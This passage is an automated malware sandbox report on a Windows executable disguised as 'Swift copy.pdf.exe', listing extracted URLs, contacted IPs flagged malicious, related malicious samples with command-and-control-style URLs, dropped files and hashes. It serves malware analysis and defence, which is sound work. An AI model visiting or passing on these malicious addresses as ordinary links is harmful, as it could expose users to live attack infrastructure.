                                              http://www.sandoll.co.krSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.urwpp.deDPleaseSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSwift copy.pdf.exe, 00000000.00000002.351601216.0000000002791000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.carterandcone.como.Swift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comSwift copy.pdf.exe, 00000000.00000003.332090387.0000000005765000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.carterandcone.comLSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.indiafoodtraveling.com/sk-logabpstatus.php?a=OHpkUkI0Y0QxUWRjUnVBV284aHBwcjQ2RmVkZlhNYU5Ycscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/cabarga.htmllSwift copy.pdf.exe, 00000000.00000003.334591290.0000000005765000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.tiro.comS~Swift copy.pdf.exe, 00000000.00000003.331103187.0000000005735000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.jiyu-kobo.co.jp/AqSwift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-bcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/pics/12471/logo.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/pics/12471/bodybg.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comuSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fontbureau.commHSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-rcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comsSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.zhongyicts.com.cnsSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.coma-dSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://en.wSwift copy.pdf.exe, 00000000.00000003.328158175.0000000005739000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/pics/12471/arrow.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfcscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comlSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                          		unknown
                                                          http://www.fontbureau.com/designers/cabarga.htmlNSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.ascendercorp.com/typedesigners.htmlvSwift copy.pdf.exe, 00000000.00000003.332048994.000000000576D000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.founder.com.cn/cnSwift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/frere-jones.htmlSwift copy.pdf.exe, 00000000.00000003.334358377.0000000005765000.00000004.00000001.sdmp, Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://i4.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.commSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.jiyu-kobo.co.jp/Swift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://i4.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnd&~uSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.fontbureau.com/designers8Swift copy.pdf.exe, 00000000.00000002.356278222.0000000005820000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.374916858.000000000B1A0000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://www.zhongyicts.com.cno.nSwift copy.pdf.exe, 00000000.00000003.330492743.0000000005736000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.fontbureau.comltom4~gSwift copy.pdf.exe, 00000000.00000002.356233417.0000000005730000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		low
                                                                http://www.jiyu-kobo.co.jp/o.HSwift copy.pdf.exe, 00000000.00000003.331358786.0000000005738000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/libgh.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/libg.png)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/12471/kwbg.jpg)cscript.exe, 0000000A.00000002.595872841.00000000050E2000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                174.136.25.55
                                                                		technomark.xyzUnited States
                                                                		33494IHNETUStrue
                                                                204.11.56.48
                                                                		www.indiafoodtraveling.comVirgin Islands (BRITISH)
                                                                		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                45.33.51.100
                                                                		hosted.fireside.fmUnited States
                                                                		63949LINODE-APLinodeLLCUSfalse
                                                                74.208.236.87
                                                                		www.rileysboutique.comUnited States
                                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                34.102.136.180
                                                                		wapgoals.comUnited States
                                                                		15169GOOGLEUSfalse
                                                                51.222.80.112
                                                                		agenciaorange.netFrance
                                                                		16276OVHFRtrue
                                                                5.101.123.53
                                                                		www.stepmed.lifeEstonia
                                                                		198068PAGM-ASEEtrue

                                                                General Information

                                                                Joe Sandbox Version:31.0.0 Emerald
                                                                Analysis ID:385261
                                                                Start date:12.04.2021
                                                                Start time:09:13:29
                                                                Joe Sandbox Product:CloudBasic
                                                                Overall analysis duration:0h 12m 10s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:light
                                                                Sample file name:Swift copy.pdf.exe
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                Number of analysed new started processes analysed:26
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:1
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • HDC enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@10/1@10/7
                                                                EGA Information:Failed
                                                                HDC Information:
                                                                • Successful, ratio: 21% (good quality ratio 19.5%)
                                                                • Quality average: 73.4%
                                                                • Quality standard deviation: 30.5%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 0
                                                                • Number of non-executed functions: 0
                                                                Cookbook Comments:
                                                                • Adjust boot time
                                                                • Enable AMSI
                                                                • Found application associated with file extension: .exe
                                                                Warnings:
                                                                Show All
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 92.122.145.220, 205.185.216.42, 205.185.216.10, 52.255.188.83, 40.88.32.150, 92.122.213.194, 92.122.213.247, 52.147.198.201, 104.43.193.48, 2.20.142.210, 2.20.142.209, 52.155.217.156, 104.43.139.144, 20.54.26.129, 172.217.168.51, 184.30.20.56, 20.50.102.62, 104.42.151.234
                                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, ghs.google.com, arc.msn.com.nsatc.net, 2-01-3cf7-0009.cdx.cedexis.net, store-images.s-microsoft.com-c.edgekey.net, wu-fg-shim.trafficmanager.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                09:14:27API Interceptor1x Sleep call for process: Swift copy.pdf.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                204.11.56.48remittance info.xlsxGet hashmaliciousBrowse
                                                                • www.fantastic-male-size.com/svh9/?5ja0c8yp=ij+ZgDP7l8XO4EzkWM1OWxe5DYkBfQhdxOd2KtRjfzMns0aOs1qKxh/wbOk7VKZjQ4PRQQ==&2dn4M=z4DhUBy8
                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                • www.network70.com/mb7q/?-ZbLpz4=lcZnn44wJ8CTD/wuULHOZdDNfKQLJFUDWmrmbSvd29smf4FbT3Q6nZbQmfWo5SiyjEZ6&3f=Blgp
                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                • www.mindframediscovery.com/mb7q/?Kzr4=MylpREVFpgK4hrQJLFGzZ7Eq8Ut192MqXeIW4x2M7+nc5esW3mvXBXSCpu2ngoz0Ij7R0ObYFg==&OtZlC2=JPhH0LRX981dlx
                                                                Formbook.exeGet hashmaliciousBrowse
                                                                • www.1396999.com/oez8/?ePI=pEvz6wUm7NkDB5cAyTZ1gvh/y9KWyAJdvyJqwgzLh6QntoRS8UVJV4gWCXXdvhTiuHaU&uZhx9b=tXxhAn0
                                                                deIt7iuD1y.exeGet hashmaliciousBrowse
                                                                • www.tiprent.com/vu9b/?1bz=jDKPMV0Psx7H2j&KnhT=z/Zq9jVkIB0yGNn3ZEHZ6NHzXk34EmaVGtMXpz0iQLYDo7kK3EXAn5/5Znk5N1+qJLeSjTna4g==
                                                                ZGNbR8E726.exeGet hashmaliciousBrowse
                                                                • www.hipnoseportugal.com/m2be/?GVFTh=fyh/eIcUW0aiZCQyfMwwrsLD1ZW7Cr5WD4UuPwf+M/sE8+UpRfQsAB3ccWCzN2YO30SJ&tv5P=ilQ8UxJh
                                                                MV Sky Marine.xlsxGet hashmaliciousBrowse
                                                                • www.felinewish.com/m2be/?pL00NNc=cTSgjfXDnz2bFoWdUkD9Bhu82D9jmXmOM4nRLHyyc50s9vDYx1pRS3bEvpVoGpgOgfMfdQ==&SJE=yZ8l2HUp_
                                                                fDFkIEBfpm.exeGet hashmaliciousBrowse
                                                                • www.felinewish.com/m2be/?kpNL=cTSgjfXGn02fF4aRWkD9Bhu82D9jmXmOM4/BXEuzYZ0t9eve2l4dEzjGsPZuNY0F154o&MZ=K40xTRg8v
                                                                4TYyYEdhtj.exeGet hashmaliciousBrowse
                                                                • www.felinewish.com/m2be/?nP3hnH=cTSgjfXGn02fF4aRWkD9Bhu82D9jmXmOM4/BXEuzYZ0t9eve2l4dEzjGsPVXB5YFi/k5EjPA0A==&DrFXA=8pDXBtXPJP
                                                                xPUqa4qbDL.jsGet hashmaliciousBrowse
                                                                • legitville.com/0.html
                                                                xPUqa4qbDL.jsGet hashmaliciousBrowse
                                                                • legitville.com/0.html
                                                                PO #6093245.exeGet hashmaliciousBrowse
                                                                • www.hangerb2b.com/b3pu/?kzrxUJ=GjMT3ma6eBTmMZ6NkR6rAGiU/BiODhxWygShWLT6el36cGVGnI9xWiRL70JBWLvmfgjT&mBy=wZOTMdR8Z49L4
                                                                REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                • www.internationalsoccerteams.com/xxg/
                                                                PO_210223.exeGet hashmaliciousBrowse
                                                                • www.pophazard.com/ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb
                                                                RFQ Manual Supersucker en Espaol.xlsxGet hashmaliciousBrowse
                                                                • www.bigias.com/dgn/?Yzrp=LfNQbftNF2CZK3Pdbvfs/GUpg4UhIVB9HREii+G/2FPSQnC/ZhagFrpEcGqY3PnsjIPUew==&Lzrl=k6fTBXMx9H
                                                                8nxKYwJna8.exeGet hashmaliciousBrowse
                                                                • www.wood-decor24.com/csv8/?UT=EhUhb4&OjKL3=3r5dRtIFgT1VahUseje8ue8NA/87jk0khJCRLUJpCdq1RUr7MGeMpqJjvp2wRjK1uE1w
                                                                win32.exeGet hashmaliciousBrowse
                                                                • www.buythinsecret.com/incn/?8pBP5p=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06IZ75j/ocR9F&L6Ah=2dSLFXghYtFd0
                                                                mitbjisfe.jsGet hashmaliciousBrowse
                                                                • urchintelemetry.com/
                                                                Details...exeGet hashmaliciousBrowse
                                                                • www.coolgadgetsdominate.com/t052/?pPX=6CpI00+2HCKGB1JbH22k369411uOsTuNarkGYMnsdTbHzEXKI/PSljtTQWzMzlp4SIHA&1b=jnKtRfexr
                                                                Fdj5vhj87S.exeGet hashmaliciousBrowse
                                                                • www.buythinsecret.com/incn/?2de=TJfvpzXJMrBT1in/CsTGivtbaFX6GTyf1u5RDlluSiJ51lGqZDPSCkL06L5BpyfQG2cC&2dpxxT=i6MpbxRhTzX8wRbP

                                                                Domains

                                                                No context

                                                                ASN

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                CONFLUENCE-NETWORK-INCVGremittance info.xlsxGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                HG546092227865431209.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                0434 pdf.exeGet hashmaliciousBrowse
                                                                • 209.99.64.55
                                                                bank transfer.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                PO-RFQ # 097663899.exeGet hashmaliciousBrowse
                                                                • 209.99.40.222
                                                                invoice.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                PO7321.exeGet hashmaliciousBrowse
                                                                • 208.91.197.39
                                                                PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                • 208.91.197.39
                                                                Lista e porosive te blerjes.exeGet hashmaliciousBrowse
                                                                • 209.99.64.33
                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                Formbook.exeGet hashmaliciousBrowse
                                                                • 204.11.56.48
                                                                ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                bank details.exeGet hashmaliciousBrowse
                                                                • 208.91.197.27
                                                                PO#7689.zip.exeGet hashmaliciousBrowse
                                                                • 208.91.197.91
                                                                ORDER_PDF.exeGet hashmaliciousBrowse
                                                                • 209.99.64.18
                                                                IHNETUSXeros from condor.htmGet hashmaliciousBrowse
                                                                • 162.219.250.45
                                                                Xero from mashreqbank.htmGet hashmaliciousBrowse
                                                                • 162.219.250.45
                                                                Xero from livibank.htmGet hashmaliciousBrowse
                                                                • 162.219.248.137
                                                                REVIEW-UPDATE.htmGet hashmaliciousBrowse
                                                                • 162.219.248.247
                                                                Statement Of Account.exeGet hashmaliciousBrowse
                                                                • 174.136.28.105
                                                                AnGaRFyL4O.exeGet hashmaliciousBrowse
                                                                • 174.136.37.109
                                                                HOPEFUL.exeGet hashmaliciousBrowse
                                                                • 174.136.37.109
                                                                https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.med-unjfsc.edu.pe%2fbb%2fnorm%2findex.php%3femail%3dnora%40viaseating.com&c=E,1,2WnpuejHK0crRSiThceRweJRQbSUEEvJy7iF6FIK2UlyT26cZed-LlZlMl3yBgsrDzjyR7tOh2I_8NafFCWIHGw2IRCfeq1uFDRWNblrvxGbmE1p19ZMWzD7&typo=1Get hashmaliciousBrowse
                                                                • 162.219.251.117
                                                                ISLONlRQUM.exeGet hashmaliciousBrowse
                                                                • 174.136.37.109
                                                                SCksBAW7IP.exeGet hashmaliciousBrowse
                                                                • 174.136.29.143
                                                                Request for Quotation.bat.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                Payment.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                RFQ specification..exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                scan383909.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                Prt scr 7604.exeGet hashmaliciousBrowse
                                                                • 174.136.29.143
                                                                purchase order.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                https://www.oakcns.com/wp-content/form/cblpf13-000360331/Get hashmaliciousBrowse
                                                                • 174.136.29.208
                                                                Custom Design_Specifications.exeGet hashmaliciousBrowse
                                                                • 192.40.115.79
                                                                http://www.afcogecodata.com.demikeutuhan.com/?tty=(rick.cameron@cogecodata.com)Get hashmaliciousBrowse
                                                                • 72.34.46.201
                                                                Unesa 20 Order and Catalogue cfm.exeGet hashmaliciousBrowse
                                                                • 174.136.29.143
                                                                LINODE-APLinodeLLCUSmalware.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                zeD11Fztx8.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                • 45.56.127.45
                                                                gunzipped.exeGet hashmaliciousBrowse
                                                                • 45.56.119.148
                                                                frox0cheats.exeGet hashmaliciousBrowse
                                                                • 176.58.123.25
                                                                nDHV6wKWHF.exeGet hashmaliciousBrowse
                                                                • 172.104.164.58
                                                                OfficeConsultPlugin.exeGet hashmaliciousBrowse
                                                                • 109.237.24.104
                                                                RFQ#798606.exeGet hashmaliciousBrowse
                                                                • 45.56.119.148
                                                                Private doc.docmGet hashmaliciousBrowse
                                                                • 109.237.24.104
                                                                lK8vF3n2e7.exeGet hashmaliciousBrowse
                                                                • 172.104.233.225
                                                                newordermx.exeGet hashmaliciousBrowse
                                                                • 45.33.2.79
                                                                sample.exeGet hashmaliciousBrowse
                                                                • 66.228.32.51
                                                                BnJvVt951o.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                BnJvVt951o.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                SMtbg7yHyR.exeGet hashmaliciousBrowse
                                                                • 45.33.54.74
                                                                9fdUNaHzLv.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                Private doc.docmGet hashmaliciousBrowse
                                                                • 212.71.251.238
                                                                invoice_document.docmGet hashmaliciousBrowse
                                                                • 212.71.251.238
                                                                sample.exe.exeGet hashmaliciousBrowse
                                                                • 173.230.145.224
                                                                Document_Opener.exe.14.exeGet hashmaliciousBrowse
                                                                • 88.80.186.210

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift copy.pdf.exe.log
                                                                Process:C:\Users\user\Desktop\Swift copy.pdf.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1314
                                                                Entropy (8bit):5.350128552078965
                                                                Encrypted:false
                                                                SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.760448355080477
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:Swift copy.pdf.exe
                                                                File size:846848
                                                                MD5:5946d0ee4becb515a1cf39ef3f3dde56
                                                                SHA1:3321193ab8c09ab1098d8104afd021145eca89c3
                                                                SHA256:2e2c3bd3883976fc398bc30cadaa16043e792861e7b12db344cd285375df8605
